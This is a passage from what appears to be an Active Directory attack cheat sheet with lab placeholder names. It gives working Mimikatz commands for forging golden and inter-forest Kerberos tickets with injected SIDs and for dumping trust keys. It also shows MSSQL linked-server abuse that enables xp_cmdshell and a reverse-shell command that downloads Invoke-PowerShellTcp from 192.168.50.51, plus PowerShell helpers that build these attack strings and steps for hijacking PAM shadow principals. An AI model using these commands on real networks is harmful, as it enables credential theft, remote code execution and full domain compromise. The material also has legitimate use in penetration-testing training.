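        [Parameter(Mandatory)][string]$ForestRootDomainSid,
        [switch]$AsDomainController     # the "avoiding suspicious logs" variant: DC groups instead of Enterprise Admins
    )
    foreach ($s in $CurrentDomainSid, $ForestRootDomainSid) {
        if (-not (Test-SidString $s)) { throw "invalid SID: $s" }
    }
    if ($AsDomainController) {
        $sids = "$ForestRootDomainSid-516,S-1-5-9"   # Domain Controllers of the root + Enterprise Domain Controllers
    } else {
        $sids = "$ForestRootDomainSid-519"           # Enterprise Admins exists only in the forest root domain
    }
    [pscustomobject]@{
        Sid       = $CurrentDomainSid
        Sids      = $sids
        Arguments = "/sid:$CurrentDomainSid /sids:$sids"
    }
}

# Constructed SIDs for the demo (lab-style, not real):
$child = 'S-1-5-21-1874506631-3219952063-538504511'   # current domain, e.g. dollarcorp.moneycorp.local
$root  = 'S-1-5-21-280534878-1496970234-700767426'    # forest root, e.g. moneycorp.local
(New-GoldenSids -CurrentDomainSid $child -ForestRootDomainSid $root).Arguments
(New-GoldenSids -CurrentDomainSid $child -ForestRootDomainSid $root -AsDomainController).Arguments
Test-SidString 'S-1-5-21-280534878-14999702234-700767426-519'   # a sub-authority wider than 32 bits fails the check
Get-DomainSid 'S-1-5-21-280534878-1496970234-700767426-519'     # recover the domain SID from a copied group SID

# Live values with ADModule loaded:
#   $child = (Get-ADDomain).DomainSID.Value
#   $root  = (Get-ADDomain -Identity (Get-ADForest).RootDomain).DomainSID.Value
```

Paste the Arguments string straight into the kerberos::golden command. The /sids value is only useful inside one forest: on a forest trust SID filtering strips it, which is why the cross-forest section below carries no /sids at all.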

Use Ticket

# PTT
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

# Access
ls \\DC.DOMAIN.local\c$

gwmi -class win32_operatingsystem -ComputerName dc.DOMAIN.local

Avoiding suspicious logs

Invoke-Mimikatz -Command '"kerberos::golden /user:dc$ /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:HASH /ptt"'

# <forest root domain SID>-516 = Domain Controllers (e.g. S-1-5-21-2578538781-2508153159-3419410681-516)
# S-1-5-9 = Enterprise Domain Controllers

# Looks like DCs talking to each other (no Administrator or Enterprise Admins SID in the ticket) and still grants us a ticket with enterprise DC privileges.

Cross-Forest Trust Tickets

Get Trust Key

# Mimikatz trust
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

# Mimikatz dump
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Creating inter-forest TGT

# No /sids here: SID filtering is enforced on forest trusts, so injected SIDs are dropped and you only get what the trusting forest has explicitly granted the impersonated user.
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'

Using inter-forest ticket to request TGS

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/TARGET-dc.DOMAIN.local

Use TGS

# Use the TGS to access the service
.\kirbikator.exe lsa .\CIFS.TARGET-dc.DOMAIN.local.kirbi

# Find file shares:
Invoke-ShareFinder -Domain DOMAIN.local

# Check access
ls \\TARGET-dc.DOMAIN.local\SharedwithDCorp\

MSSQL Trust Abuse

Finding MSSQL Instances

# Discovery (SPN scanning):
Get-SQLInstanceDomain

# Check accessibility:
Get-SQLConnectionTestThreaded

# Use together:
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

# Gather information:
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
PowerUpSQL:
# Look for links to remote servers
Get-SQLServerLink -Instance instance-mssql -Verbose

# Enumerate nested database links
Get-SQLServerLinkCrawl -Instance instance-mssql -Verbose

Manual SQL:
# Look for links to remote servers
select * from openquery("INSTANCE",'select * from master..sysservers')

# Enumerate nested database links (every level of nesting doubles the single quotes of the inner query)
select * from openquery("INSTANCE",'select * from openquery("dcorpmgmt",''select * from master..sysservers'')')

Enabling xp_cmdshell over a link if RPC Out is enabled on the link (disabled by default)

EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "INSTANCE"

Executing Commands

PowerUpSQL:
# Executes the command over the link chain
Get-SQLServerLinkCrawl -Instance INSTANCE -Query "exec master..xp_cmdshell 'whoami'"

# Shell
Get-SQLServerLinkCrawl -Instance INSTANCE -Query "exec master..xp_cmdshell 'powershell.exe iex (iwr http://192.168.50.51/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.50.51 -Port 443'"

Manual SQL:
# Executes a command over nested links (openquery needs a result set, hence the select before the exec)
select * from openquery("dcorp-sql1",'select * from openquery("dcorpmgmt",''select * from openquery("eu-sql",''''select @@version as version;exec master..xp_cmdshell "powershell whoami"'''')'')')
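The quote doubling in the nested openquery() and EXECUTE ... AT statements above is mechanical but error-prone past two links. As an added example (not code from the original page or from PowerUpSQL), the functions below generate those statements for an arbitrary chain of linked servers; the server names are the placeholders used on this page.

```powershell
# Added example, not from the original page: generate nested linked-server statements.

function New-LinkedQuery {
    # $Chain lists the linked servers from the one you are connected to outward.
    # openquery() must return a result set, so an exec has to be preceded by a select.
    param(
        [Parameter(Mandatory)][string[]]$Chain,
        [Parameter(Mandatory)][string]$Query
    )
    $q = $Query
    for ($i = $Chain.Count - 1; $i -ge 0; $i--) {          # wrap innermost link first
        $q = 'select * from openquery("{0}",''{1}'')' -f $Chain[$i], $q.Replace("'", "''")
    }
    $q
}

function New-LinkedExec {
    # Same idea for EXECUTE ... AT, which runs a batch on the remote side without needing a result set
    # (so it can carry sp_configure) but requires RPC Out to be enabled on every link in the chain.
    param(
        [Parameter(Mandatory)][string[]]$Chain,
        [Parameter(Mandatory)][string]$Batch
    )
    $q = $Batch
    for ($i = $Chain.Count - 1; $i -ge 0; $i--) {
        $q = 'EXECUTE(''{0}'') AT "{1}"' -f $q.Replace("'", "''"), $Chain[$i]
    }
    $q
}

# Two hops, as in the enumeration example on this page:
New-LinkedQuery -Chain 'INSTANCE','dcorpmgmt' -Query 'select * from master..sysservers'

# Three hops with command execution; the select gives openquery its result set:
New-LinkedQuery -Chain 'dcorp-sql1','dcorpmgmt','eu-sql' -Query 'select @@version as version;exec master..xp_cmdshell ''powershell whoami'''

# Enable xp_cmdshell two hops away (RPC Out needed on both links):
New-LinkedExec -Chain 'dcorp-sql1','dcorpmgmt' -Batch 'sp_configure ''xp_cmdshell'',1;reconfigure;'

# Run the generated statement on the first server, e.g. with PowerUpSQL:
#   Get-SQLQuery -Instance dcorp-sql1 -Query (New-LinkedQuery -Chain 'dcorp-sql1','dcorpmgmt' -Query 'select * from master..sysservers')
```

The two-hop output is byte-for-byte the manual query shown above, and the three-hop output has the same shape as the nested xp_cmdshell example. Each extra link doubles the quote count again (1, 2, 4, 8 ...), which is why hand-writing the fourth hop usually goes wrong.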

PAM Trust

PAM (Privileged Access Management) introduces a bastion forest for management and Shadow Security Principals: groups in the bastion forest whose msDS-ShadowPrincipalSid maps them to high-privilege groups (e.g. Enterprise Admins) of the managed forest. This allows management of the production forest without changing its groups or ACLs and without interactive logons there. PAM also introduces temporary (time-bound) group membership, so permissions are only granted for a set time.

Enumeration

# Import ADModule first

# Detect whether the current forest has a PAM trust (transitive forest trust with SID filtering disabled)
Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}

# Enumerate Shadow Principals (run in the bastion forest)
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

# Check whether the current forest is managed by a bastion forest
Get-ADTrust -Filter {(ForestTransitive -eq $True)}
# TrustAttributes containing TRUST_ATTRIBUTE_PIM_TRUST (0x400) + TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL (0x40) = PAM trust

Abuse

# Find the users in shadow principals and the names of the shadow principal objects
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

# Add a compromised bastion-forest user to the shadow principal (needs write rights on it, e.g. bastion DA)
Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=gcbsec,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=gcbsec,DC=local"}

# With the bastion forest compromised you can manage the production forest with EA permissions.